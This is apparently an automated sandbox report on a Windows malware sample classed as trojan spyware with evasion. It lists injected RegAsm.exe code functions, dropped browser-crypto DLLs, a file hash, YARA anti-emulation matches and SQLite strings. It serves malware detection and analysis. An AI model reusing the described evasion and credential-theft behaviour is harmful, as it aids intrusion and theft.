Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CAFEE70	29_2_6CAFEE70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CB8BE40	29_2_6CB8BE40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CBA8FB0	29_2_6CBA8FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CA6EFB0	29_2_6CA6EFB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CA81F90	29_2_6CA81F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CB0BFF0	29_2_6CB0BFF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CA60FE0	29_2_6CA60FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CB7DFC0	29_2_6CB7DFC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CA95F20	29_2_6CA95F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CA55F30	29_2_6CA55F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CBB7F20	29_2_6CBB7F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CA66F10	29_2_6CA66F10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CACEF40	29_2_6CACEF40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CA6D8E0	29_2_6CA6D8E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CA938E0	29_2_6CA938E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CBBB8F0	29_2_6CBBB8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CAFF8C0	29_2_6CAFF8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CAB0820	29_2_6CAB0820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CAEA820	29_2_6CAEA820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CABD810	29_2_6CABD810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CB34840	29_2_6CB34840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CB209B0	29_2_6CB209B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CAF09A0	29_2_6CAF09A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CB1A9A0	29_2_6CB1A9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CB31990	29_2_6CB31990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CA71980	29_2_6CA71980
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CB7C9E0	29_2_6CB7C9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CA949F0	29_2_6CA949F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CAC59F0	29_2_6CAC59F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CAF79F0	29_2_6CAF79F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CAF99C0	29_2_6CAF99C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CA999D0	29_2_6CA999D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CB15920	29_2_6CB15920
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CA98960	29_2_6CA98960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CADF960	29_2_6CADF960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CB1D960	29_2_6CB1D960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CA5E950	29_2_6CA5E950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CA68AA0	29_2_6CA68AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CADEA80	29_2_6CADEA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CA61AE0	29_2_6CA61AE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CB18A30	29_2_6CB18A30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CB01A10	29_2_6CB01A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CB0EA00	29_2_6CB0EA00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CA9FA10	29_2_6CA9FA10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CADCA70	29_2_6CADCA70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CAB9BA0	29_2_6CAB9BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CB00BA0	29_2_6CB00BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CAA7BF0	29_2_6CAA7BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CAABB20	29_2_6CAABB20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CA51B70	29_2_6CA51B70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CB8A480	29_2_6CB8A480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CA614E0	29_2_6CA614E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CAA64D0	29_2_6CAA64D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CAFA4D0	29_2_6CAFA4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CAC4420	29_2_6CAC4420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CAEA430	29_2_6CAEA430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CAED410	29_2_6CAED410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CA78460	29_2_6CA78460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CA545B0	29_2_6CA545B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CA99590	29_2_6CA99590
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CB2A5E0	29_2_6CB2A5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CAEE5F0	29_2_6CAEE5F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CAE55F0	29_2_6CAE55F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CBAF510	29_2_6CBAF510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CAC7500	29_2_6CAC7500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CA75510	29_2_6CA75510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CB00570	29_2_6CB00570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CAC2560	29_2_6CAC2560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CBA8550	29_2_6CBA8550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CAB8540	29_2_6CAB8540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CA916A0	29_2_6CA916A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CAC96A0	29_2_6CAC96A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CABE6E0	29_2_6CABE6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CAFE6E0	29_2_6CAFE6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CA846D0	29_2_6CA846D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CA56600	29_2_6CA56600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CA89600	29_2_6CA89600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CAD7610	29_2_6CAD7610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CAB5640	29_2_6CAB5640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CA79650	29_2_6CA79650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CABC650	29_2_6CABC650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CAEB7A0	29_2_6CAEB7A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CA57790	29_2_6CA57790
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CA8A7D0	29_2_6CA8A7D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CA83720	29_2_6CA83720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CAE0700	29_2_6CAE0700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CACD710	29_2_6CACD710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CA700B0	29_2_6CA700B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CB17090	29_2_6CB17090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CA58090	29_2_6CA58090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CAAB020	29_2_6CAAB020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CB28010	29_2_6CB28010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CB2C000	29_2_6CB2C000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CAAE070	29_2_6CAAE070

Dropped file seen in connection with other malware

Source: Joe Sandbox View

Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA

Found potential string decryption / allocating functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0040AA20 appears 134 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 00404610 appears 317 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6CBE09D0 appears 158 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6CB7CBE8 appears 134 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6CB894D0 appears 90 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0040A310 appears 59 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6CD709D0 appears 114 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 004020FD appears 287 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6CBED930 appears 68 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0041A3AC appears 77 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6CBEDAE0 appears 77 times

One or more processes crash

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 1760

PE / OLE file has an invalid certificate

Source: file.exe

Static PE information: invalid certificate

Sample file is different than original file name gathered from version info

Source: file.exe, 00000000.00000002.1244342672.000000000160E000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: OriginalFilenameclr.dllT vs file.exe

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 29.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 29.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 27.2.userIEHDAFHDHC.exe.38b5570.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 27.2.userIEHDAFHDHC.exe.38b5570.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 0000001D.00000002.1926386102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: Process Memory Space: userIEHDAFHDHC.exe PID: 7444, type: MEMORYSTR	Matched rule: Molerats_Jul17_Sample_5 date = 2017-07-07, hash1 = ebf2423b9de131eab1c61ac395cbcfc2ac3b15bd9c83b96ae0a48619a4a38d0a, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/

Source: file.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: userFBKFCFBFID.exe.3.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 66cf818156193_ldjfnsfd[1].exe.3.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: userIEHDAFHDHC.exe.3.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 66cf75d3791d7_vrewqgq[1].exe.3.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: DHCGHDHIDH.exe.29.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: HDAFIIDAKJ.exe.29.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@49/63@3/6

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_6CBA7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

3_2_6CBA7030

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_004190A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

3_2_004190A0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 24_2_004365E0 CoCreateInstance,

24_2_004365E0

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

Jump to behavior

Source: C:\ProgramData\HDAFIIDAKJ.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7420:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7276:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6048:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7452:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2348:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4476:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2168:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6228:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3168
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4800

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File created: C:\Users\user~1\AppData\Local\Temp\delays.tmp

Jump to behavior

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: file.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr, softokn3[1].dll.29.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: RegAsm.exe, 00000003.00000002.1426203264.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1399562953.000000001B63E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1427642500.000000006CD7F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 0000001D.00000002.1937546619.000000001E56E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1943691071.00000000244D8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, sql[1].dll.29.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr, softokn3[1].dll.29.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: RegAsm.exe, 00000003.00000002.1426203264.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1399562953.000000001B63E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1427642500.000000006CD7F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 0000001D.00000002.1937546619.000000001E56E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1943691071.00000000244D8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, sql[1].dll.29.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: RegAsm.exe, RegAsm.exe, 0000001D.00000002.1937546619.000000001E56E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1943691071.00000000244D8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, sql[1].dll.29.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: RegAsm.exe, 00000003.00000002.1426203264.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1399562953.000000001B63E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1427642500.000000006CD7F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 0000001D.00000002.1937546619.000000001E56E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1943691071.00000000244D8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, sql[1].dll.29.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr, softokn3[1].dll.29.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: RegAsm.exe, RegAsm.exe, 0000001D.00000002.1937546619.000000001E56E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1943691071.00000000244D8000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.29.dr	Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr, softokn3[1].dll.29.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr, softokn3[1].dll.29.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr, softokn3[1].dll.29.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: RegAsm.exe, 0000001D.00000002.1937546619.000000001E56E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1943691071.00000000244D8000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.29.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr, softokn3[1].dll.29.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: RegAsm.exe, RegAsm.exe, 00000003.00000002.1426203264.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1399562953.000000001B63E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1427642500.000000006CD7F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 0000001D.00000002.1937546619.000000001E56E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1943691071.00000000244D8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, sql[1].dll.29.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: RegAsm.exe, 00000003.00000002.1426203264.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1399562953.000000001B63E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: RegAsm.exe, 00000003.00000002.1426203264.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1399562953.000000001B63E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1427642500.000000006CD7F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 0000001D.00000002.1937546619.000000001E56E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1943691071.00000000244D8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, sql[1].dll.29.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr, softokn3[1].dll.29.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: RegAsm.exe, 0000001D.00000002.1937546619.000000001E56E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1943691071.00000000244D8000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.29.dr	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
